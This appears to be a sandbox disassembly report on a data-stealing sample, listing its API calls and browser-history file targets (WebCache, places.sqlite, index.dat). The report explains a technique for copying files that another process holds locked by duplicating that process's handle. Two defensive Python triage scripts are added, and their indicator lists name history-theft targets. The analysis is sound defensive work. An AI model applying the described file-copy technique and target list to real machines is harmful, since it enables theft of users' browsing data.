                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressCloseProcVersionmemsetwcscpy
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                              • API String ID: 2705122986-2036018995
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmpqsort
                                                              • String ID: /nosort$/sort
                                                              • API String ID: 1579243037-1578091866
                                                              APIs
                                                              • memset.MSVCRT ref: 0040E60F
                                                              • memset.MSVCRT ref: 0040E629
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Strings
                                                              • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                              • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                              • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                              • API String ID: 3354267031-2114579845
                                                              • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                              • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                              • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                              • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                              APIs
                                                              • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                              • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                              • LockResource.KERNEL32(00000000), ref: 004148EF
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindLoadLockSizeof
                                                              • String ID:
                                                              • API String ID: 3473537107-0
                                                              • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                              • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                              • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                              • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                              • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                              • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                              • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                              APIs
                                                              Strings
                                                              • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: only a single result allowed for a SELECT that is part of an expression
                                                              • API String ID: 2221118986-1725073988
                                                              • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                              • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                              • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                              • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                              APIs
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                              • DeleteObject.GDI32(00000000), ref: 004125E7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ??3@DeleteObject
                                                              • String ID: r!A
                                                              • API String ID: 1103273653-628097481
                                                              • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                              • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                              • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                              • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ??2@
                                                              • String ID:
                                                              • API String ID: 1033339047-0
                                                              • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                              • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                              • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                              • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                              APIs
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                              • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$memcmp
                                                              • String ID: $$8
                                                              • API String ID: 2808797137-435121686
                                                              • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                              • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                              • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                              • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                              APIs
                                                                • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                              • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                              • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                              • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                              • String ID:
                                                              • API String ID: 1979745280-0
                                                              • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                              • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                              • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                              • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                              APIs
                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                              • memset.MSVCRT ref: 00403A55
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                              • String ID: history.dat$places.sqlite
                                                              • API String ID: 2641622041-467022611
                                                              • Opcode ID: 05f9737078ef75c1c81c27231a8cbd2d8a2d76354893ce3757c3369515f6e8ef
                                                              • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                              • Opcode Fuzzy Hash: 05f9737078ef75c1c81c27231a8cbd2d8a2d76354893ce3757c3369515f6e8ef
                                                              • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                              APIs
                                                                • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                              • GetLastError.KERNEL32 ref: 00417627
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$File$PointerRead
                                                              • String ID:
                                                              • API String ID: 839530781-0
                                                              • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                              • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                              • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                              • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst
                                                              • String ID: *.*$index.dat
                                                              • API String ID: 1974802433-2863569691
                                                              • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                              • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                              • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                              • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
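The records above that a triager reads first are the function at 0040E60F referencing Microsoft\Windows\WebCache\WebCacheV01.dat and WebCacheV24.dat, the function at 0040E582 whose helper 0040E01E calls OpenProcess with access 00000040 (PROCESS_DUP_HANDLE), DuplicateHandle, CreateFileMappingW, MapViewOfFile and WriteFile, which is consistent with copying a file that another process holds open by borrowing that process's handle, and the two records whose String ID fields name history.dat$places.sqlite and *.*$index.dat. Note that in several records the "Strings" section is empty while the "String ID" line under Similarity still carries the literals joined by "$". The script below is an added example, not Joe Sandbox or Remcos code: it parses records in this listing format, reads "String ID" as a fallback, and tags each function with a capability label derived from an ordered API-sequence rule or a string indicator. The excerpt it runs on is constructed from the lines above; the rule names and indicator lists are this example's own assumptions.

```python
"""Added triage helper (example code, not Joe Sandbox's or the sample's): parse the
per-function "APIs"/"Strings" records of an IDA-plugin listing and tag each function
with the capability its API order or referenced file names suggest. Rule names are
this example's own labels, not report fields."""
import re
from collections import namedtuple

# Constructed excerpt in the listing's own format: five functions from the report above.
SAMPLE_LISTING = r"""
APIs
• memset.MSVCRT ref: 0040E60F
Strings
• Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
Memory Dump Source
• String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
APIs
• FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
• SizeofResource.KERNEL32(?,00000000), ref: 004148D4
• LoadResource.KERNEL32(?,00000000), ref: 004148E4
• LockResource.KERNEL32(00000000), ref: 004148EF
Memory Dump Source
APIs
  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104), ref: 0040E093
  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
Memory Dump Source
Strings
Memory Dump Source
• String ID: history.dat$places.sqlite
Strings
Memory Dump Source
• String ID: *.*$index.dat
"""

API_RE = re.compile(r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?(?P<name>[^.\s]+)\."
                    r"(?P<module>\w+)(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
STRING_RE = re.compile(r"^•\s*(?P<text>.*?),\s*xrefs:\s*(?P<ref>[0-9A-Fa-f]+)$")
STRING_ID_RE = re.compile(r"^•\s*String ID:\s*(?P<ids>.*)$")
ApiCall = namedtuple("ApiCall", "name module ref subcall")  # subcall: helper address, or ""

API_SEQUENCES = {  # ordered subsequences (gaps allowed) over A/W-folded call names
    "embedded_resource_extraction": ("FindResource", "SizeofResource", "LoadResource", "LockResource"),
    "locked_file_copy_via_duplicated_handle": ("OpenProcess", "DuplicateHandle", "CreateFileMapping", "MapViewOfFile", "WriteFile"),
}
STRING_INDICATORS = {  # case-insensitive substrings of the strings a function references
    "browser_history_ie_edge": ("webcachev01.dat", "webcachev24.dat", "index.dat"),
    "browser_history_firefox": ("places.sqlite", "history.dat"),
}

class FunctionRecord:
    def __init__(self):
        self.apis, self.strings, self.capabilities = [], [], set()  # strings: (text, xref or None)

def canonical(name):
    """Fold ANSI/wide variants (CreateFileMappingW -> CreateFileMapping) so one rule matches both."""
    return name[:-1] if len(name) > 2 and name[-1] in "AW" and name[-2].islower() else name

def classify(rec):
    """Return the capability names whose rules match one function record."""
    names, caps = [canonical(a.name) for a in rec.apis], set()
    for cap, seq in API_SEQUENCES.items():
        it = iter(names)  # each wanted name must turn up after the previous match
        if all(any(n == w for n in it) for w in seq):
            caps.add(cap)
    low = [s.lower() for s, _ in rec.strings]
    caps |= {cap for cap, needles in STRING_INDICATORS.items() if any(n in s for s in low for n in needles)}
    return caps

def parse_records(text):
    """A record runs from its APIs/Strings header through the metadata after "Memory Dump Source"."""
    records, cur, section = [], None, "meta"
    for line in (raw.strip() for raw in text.splitlines()):
        if line in ("APIs", "Strings"):
            if cur is None or section == "meta":  # a header after metadata opens the next function
                cur = FunctionRecord()
                records.append(cur)
            section = line
        elif line == "Memory Dump Source":
            section = "meta"
        elif section == "APIs" and (m := API_RE.match(line)):
            cur.apis.append(ApiCall(m["name"], m["module"], m["ref"], m["sub"] or ""))
        elif section == "Strings" and (m := STRING_RE.match(line)):
            cur.strings.append((m["text"], m["ref"]))
        elif section == "meta" and cur is not None and (m := STRING_ID_RE.match(line)):
            # "Strings" is often empty while "String ID" still lists the literals joined by "$":
            # take those as a fallback, skipping ones the Strings section already gave an xref for.
            seen = {s for s, _ in cur.strings}
            for s in dict.fromkeys(p.strip() for p in m["ids"].split("$")):
                if s and s not in seen:
                    cur.strings.append((s, None))
    for rec in records:
        rec.capabilities = classify(rec)
    return records

def summarize(records):
    """Map capability -> anchors (first call-site address, else first string xref, else "n/a")."""
    out = {}
    for rec in records:
        anchor = rec.apis[0].ref if rec.apis else next((x for _, x in rec.strings if x), "n/a")
        for cap in sorted(rec.capabilities):
            out.setdefault(cap, []).append(anchor)
    return out

if __name__ == "__main__":
    for cap, anchors in summarize(parse_records(SAMPLE_LISTING)).items():
        print(f"{cap:40s} {' '.join(anchors)}")
```

Feed it the full "APIs"/"Strings" listing of a report and `summarize()` gives one line per capability with the call-site addresses to jump to in the dump. The sequence rules deliberately allow gaps, because the plugin interleaves direct calls with "Part of subcall" lines in the order it walked them, and the A/W folding keeps one rule valid for both string encodings.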
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                              • GetLastError.KERNEL32 ref: 004175A2
                                                              • GetLastError.KERNEL32 ref: 004175A8
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FilePointer
                                                              • String ID:
                                                              • API String ID: 1156039329-0
                                                              • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                              • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                              • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                              • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                              • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                              • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleTime
                                                              • String ID:
                                                              • API String ID: 3397143404-0
                                                              • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                              • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                              • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                              • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
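The values in parentheses on each API line are the arguments the plugin recovered from the stack at the call site, printed raw. The CreateFileW at 0040A044 above is called with 80000000, 00000003, 00000003 and 02000000 in the access, share, disposition and flags positions, the OpenProcess in subcall 0040E01E with 00000040, the CreateFileMappingW with 00000002 as protection and the MapViewOfFile with 00000004 as access. Turning those into names is the quickest way to tell what a handle is for. The script below is an added example, not part of the report or the sample: it maps argument positions of the APIs seen in this listing to documented Win32 flag names. The sample lines are copied from the listing above; values past an API's real parameter count (CreateFileW has seven) and values the plugin printed as ? are not decoded.

```python
"""Added example (not Joe Sandbox code): decode the raw argument values the listing
prints at a call site into Win32 flag names, so a reader can see at a glance how a
file, process or mapping is being opened. The tables cover only the APIs seen here."""
import re

CALL_RE = re.compile(r"(?P<name>[^.\s]+)\.\w+\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

# Documented Win32 constant values for the decoded arguments.
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE", 0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x02: "FILE_ATTRIBUTE_HIDDEN", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x40000000: "FILE_FLAG_OVERLAPPED"}
PROCESS = {0x1: "PROCESS_TERMINATE", 0x2: "PROCESS_CREATE_THREAD", 0x8: "PROCESS_VM_OPERATION", 0x10: "PROCESS_VM_READ",
           0x20: "PROCESS_VM_WRITE", 0x40: "PROCESS_DUP_HANDLE", 0x400: "PROCESS_QUERY_INFORMATION"}
PAGE = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
FILE_MAP = {0x2: "FILE_MAP_WRITE", 0x4: "FILE_MAP_READ", 0x20: "FILE_MAP_EXECUTE"}

# API name (A/W suffix folded) -> {argument position: (label, table, decode as bitmask?)}
ARG_SCHEMA = {
    "CreateFile": {1: ("access", GENERIC, True), 2: ("share", SHARE, True),
                   4: ("disposition", DISPOSITION, False), 5: ("flags", FILE_FLAGS, True)},
    "OpenProcess": {0: ("access", PROCESS, True)},
    "CreateFileMapping": {2: ("protect", PAGE, True)},
    "MapViewOfFile": {1: ("access", FILE_MAP, True)},
}

SAMPLE_CALLS = [  # copied from the listing above; the GetFileTime line has no schema and is skipped
    "• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044",
    "  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093",
    "  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE",
    "  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113",
    "• GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058",
]

def decode_value(value, table, bitmask):
    """Name a value from `table`; for bitmasks name every known bit and report leftovers as hex."""
    if not bitmask:
        return table.get(value, hex(value))
    names = [name for bit, name in table.items() if value & bit]
    rest = value
    for bit in table:
        rest &= ~bit
    if rest:
        names.append(hex(rest))
    return "|".join(names) or "0"

def decode_call(line):
    """Parse one "APIs" line; return (api, ref, {label: decoded}) or None when no schema applies."""
    m = CALL_RE.search(line)
    if not m:
        return None
    name = m["name"]
    base = name[:-1] if len(name) > 2 and name[-1] in "AW" and name[-2].islower() else name
    schema = ARG_SCHEMA.get(base)
    if schema is None:
        return None
    args = [a.strip() for a in m["args"].split(",")]
    decoded = {}
    for pos, (label, table, bitmask) in schema.items():
        if pos >= len(args) or not re.fullmatch(r"[0-9A-Fa-f]+", args[pos]):
            decoded[label] = "?"  # the plugin could not recover this argument
        else:
            decoded[label] = decode_value(int(args[pos], 16), table, bitmask)
    return base, m["ref"], decoded

def decode_listing(lines):
    """Decode every call with a schema in a list of listing lines; other lines are skipped."""
    return [r for r in map(decode_call, lines) if r is not None]

if __name__ == "__main__":
    for api, ref, fields in decode_listing(SAMPLE_CALLS):
        print(api, "@", ref, " ".join(f"{k}={v}" for k, v in fields.items()))
```

Only the positions an API actually defines are looked up, so stack residue after the last real parameter is ignored rather than misread, and a ? from the plugin stays a ? in the output instead of being decoded as zero.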
